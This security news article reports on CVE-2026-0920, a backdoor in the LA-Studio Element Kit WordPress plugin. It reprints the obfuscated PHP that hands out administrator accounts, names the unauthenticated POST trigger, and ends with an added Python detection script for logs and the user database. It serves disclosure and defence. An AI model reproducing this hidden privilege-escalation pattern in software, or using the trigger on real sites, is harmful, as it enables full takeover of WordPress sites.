Over 20,000 active installations of the LA-Studio Element Kit for Elementor WordPress plugin are exposed to unauthenticated attacks because of a critical backdoor vulnerability. The flaw, discovered on January 12, 2026, lets attackers create malicious administrator accounts without authenticating.
Security company Wordfence verified the issue through its Bug Bounty Program and credited researchers Athiwat Tiprasaharn (Jitlada), Itthidej Aramsri (Boeing777), and Waris Damkham, who received a $975 bounty. Tracked as CVE-2026-0920, the vulnerability carries a CVSS score of 9.8 (Critical); the plugin is an Elementor add-on that provides header builders, widgets, and WooCommerce support. All versions from the first release through 1.5.6.3 are affected. After Wordfence's prompt disclosure through its Vulnerability Management Portal, LA-Studio released a fix in version 1.6.0 on January 14, 2026.
The vendor disclosed that a former employee inserted the backdoor code shortly before leaving in December 2025, underscoring the insider-threat risk. Wordfence added firewall protection for Premium, Care, and Response users on January 13, 2026, and for free users on February 12, 2026. Sites need to be updated immediately to prevent exploitation.
Technical Analysis and Details of the Exploit

The backdoor is concealed in the ajax_register_handle() function of the LaStudio_Kit_Integration class, which handles user registrations. An attacker supplies the lakit_bkrole parameter to trigger obfuscated code that grants administrator privileges. The key code snippets, as published in the analysis (elided portions are the article's own omissions):

```php
public function ajax_register_handle($request) {
    // ... validation checks ...
    if (!empty($request['lakit_bkrole']) && !empty($sys_meta_key)) {
        // Hooks the backup handler onto the user-meta filter so the
        // account's capabilities are rewritten during registration.
        add_filter($sys_meta_key, [ $this, 'ajax_register_handle_backup' ], 20);
    }
    // ... registration logic ...
}
```

The ajax_register_handle_backup() method injects the admin capabilities:

```php
public function ajax_register_handle_backup($meta) {
    global $table_prefix;
    // Builds the usermeta key under which WordPress stores roles
    $data = $table_prefix . LaStudio_Kit_Helper::capabilities();
    return apply_filters('lastudio-kit/integration/user-meta', $meta, $data);
}
```

The role assignment itself is hidden behind a filter:

```php
add_filter('lastudio-kit/integration/user-meta', function ($value, $label) {
    if (class_exists('LaStudio_Kit_Helper')) {
        // "adstrator" + "mini" inserted at offset 2 => "administrator"
        $k = substr_replace(LaStudio_Kit_Helper::lakit_active(), 'mini', 2, 0);
        $value[$label] = [ $k => 1 ];
    }
    return $value;
}, 10, 2);
```

Here LaStudio_Kit_Helper::lakit_active() returns "adstrator", which substr_replace() turns into "administrator" by inserting "mini" at offset 2. Because the literal role name never appears in the source, this string manipulation evaded simple signature scans. Unauthenticated attackers send a POST request containing lakit_bkrole, a username, an email address, and a password to the registration endpoint.
With full administrator access, the new user can upload plugins and themes, manipulate content, plant persistent backdoors, and add redirects. According to Wordfence, earlier releases such as 1.5.6.4 and 1.5.6.3 carried changelog entries like "Fixed security issue", yet the backdoor remained active until 1.6.0. WordPress administrators should update to LA-Studio Element Kit 1.6.0 or later immediately.
Recommended follow-up actions:

- Check the wp_users table for rogue administrator accounts, paying attention to recent registrations.
- Enable a firewall such as Wordfence.
- Search access logs for suspicious POST requests to /wp-admin/admin-ajax.php that carry lakit_bkrole.
- Enforce strong offboarding: revoke credentials and audit code commits after an employee's departure.
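The two checks above (log review and rogue-admin hunting) as an added example; this is not code from the article, from LA-Studio, or from Wordfence. It assumes a standard combined-format access log and uses an in-memory sqlite3 stand-in for the wp_users/wp_usermeta tables (a real site runs MySQL, but the query is plain SQL). The log lines, user rows, and table prefix are constructed. Two practical details the article does not spell out: a role is stored in wp_usermeta under the key {prefix}capabilities, not in wp_users, so the admin check must join both tables; and a combined-format access log records only the query string, so lakit_bkrole sent in a POST body is invisible there unless a WAF or request-body log captured it.

```python
import re
import sqlite3
from typing import Dict, List, Tuple

AJAX_ENDPOINT = "/wp-admin/admin-ajax.php"
BACKDOOR_PARAM = "lakit_bkrole"   # indicator named in the advisory

# Apache/nginx "combined" format. The request line holds only the path and
# query string; POST bodies are never logged here.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not from a real incident).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2026:02:14:09 +0000] "POST /wp-admin/admin-ajax.php?lakit_bkrole=1 HTTP/1.1" 200 58 "-" "python-requests/2.31"
198.51.100.4 - - [13/Jan/2026:02:15:31 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 44 "https://example.test/wp-admin/" "Mozilla/5.0"
203.0.113.7 - - [13/Jan/2026:02:16:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "python-requests/2.31"
192.0.2.9 - - [13/Jan/2026:02:20:45 +0000] "GET /shop/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""


def find_backdoor_requests(log_text: str) -> List[Dict[str, str]]:
    """Parsed entries whose request line targets admin-ajax.php and carries
    lakit_bkrole. Only query-string occurrences are visible; the third sample
    line (body-only POST) is deliberately NOT matched, which is the blind spot."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        if entry["path"].startswith(AJAX_ENDPOINT) and BACKDOOR_PARAM in entry["path"]:
            hits.append(entry)
    return hits


def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for wp_users / wp_usermeta with constructed rows:
    a long-standing admin, a recent subscriber, and a recent rogue admin."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES
          (1, 'siteowner',  'owner@example.test', '2024-03-01 09:00:00'),
          (2, 'customer42', 'c42@example.test',   '2026-01-13 02:10:00'),
          (3, 'svc_update', 'x@attacker.invalid', '2026-01-13 02:14:10');
        INSERT INTO wp_usermeta VALUES
          (1, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
          (2, 2, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
          (3, 3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
    """)
    return conn


def find_recent_admins(conn: sqlite3.Connection, since: str,
                       prefix: str = "wp_") -> List[Tuple]:
    """Administrator accounts registered on or after `since`
    ('YYYY-MM-DD HH:MM:SS'). WordPress keeps roles as a serialized PHP array in
    usermeta under '{prefix}capabilities'. `prefix` is the $table_prefix from
    wp-config.php (operator-controlled, never user input)."""
    sql = f"""
        SELECT u.ID, u.user_login, u.user_email, u.user_registered
        FROM {prefix}users u
        JOIN {prefix}usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = ? AND m.meta_value LIKE '%"administrator"%'
          AND u.user_registered >= ?
        ORDER BY u.user_registered
    """
    return conn.execute(sql, (f"{prefix}capabilities", since)).fetchall()


if __name__ == "__main__":
    for h in find_backdoor_requests(SAMPLE_LOG):
        print(f"[log] {h['ip']} {h['ts']} {h['method']} {h['path']}")
    conn = build_sample_db()
    for row in find_recent_admins(conn, "2025-12-01 00:00:00"):
        print("[db] admin created since cutoff:", row)
```

Run it as-is to see the one query-string hit and the one rogue admin; against a real site, feed the access log text to find_backdoor_requests() and point find_recent_admins() at the live database with the site's actual table prefix. Any administrator that appears after the cutoff and was not created by a known person should be treated as a compromise indicator, and the blind spot for body-only POSTs means an empty log result does not clear the site.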